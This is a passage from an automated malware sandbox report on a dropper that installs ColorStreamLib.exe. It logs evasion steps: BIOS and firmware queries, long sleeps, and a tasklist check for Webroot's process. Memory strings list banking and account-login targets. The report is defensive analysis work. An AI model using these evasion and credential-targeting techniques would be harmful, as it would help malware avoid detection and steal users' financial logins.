                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: wsock32.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: iconcodecservice.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: twinui.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: pdh.dll
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: qnUFsmyxMm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: qnUFsmyxMm.exeStatic file information: File size 2462720 > 1048576
                  Source: qnUFsmyxMm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x23d600
                  Source: qnUFsmyxMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: qnUFsmyxMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: qnUFsmyxMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: qnUFsmyxMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: qnUFsmyxMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: qnUFsmyxMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: qnUFsmyxMm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: qnUFsmyxMm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Admin\Workspace\1724252660\Project\Release\Project.pdb source: qnUFsmyxMm.exe, 00000000.00000003.3787196856.0000000002796000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000000.2029041591.0000000000B4F000.00000002.00000001.01000000.00000003.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmp
                  Source: qnUFsmyxMm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: qnUFsmyxMm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: qnUFsmyxMm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: qnUFsmyxMm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: qnUFsmyxMm.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x880373
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
                  Source: qnUFsmyxMm.exeStatic PE information: section name: .fptable
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.exe.0.drStatic PE information: section name: .didata
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.drStatic PE information: section name: .didata
                  Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.drStatic PE information: section name: .didata
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_009179B2 push 80FFFFFFh; ret 0_2_009179B7
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00911DAC push ebx; retf 0_2_00911DAD
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CCC30 push eax; mov dword ptr [esp], 959493C2h0_2_007CCC31
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007C9EB0 push eax; mov dword ptr [esp], 9B9C9D9Eh0_2_007C9EBE
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile created: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile created: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-96L6E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile created: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeFile created: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeFile created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeFile created: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CF3GQ.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmpAPI coverage: 0.0 %
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exe TID: 5608Thread sleep time: -210000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826295678.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3808879352.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3915518558.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3868587610.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000002.3980750648.0000000000D62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: qnUFsmyxMm.exe, 00000000.00000002.3980750648.0000000000D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP~
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826295678.0000000003403000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: qnUFsmyxMm.exe, 00000000.00000003.3826409840.0000000003391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_007CB5B0 LdrInitializeThunk,0_2_007CB5B0
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\qnUFsmyxMm.exeCode function: 0_2_00B1D350 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B1D350

                  HIPS / PFW / Operating System Protection Evasion

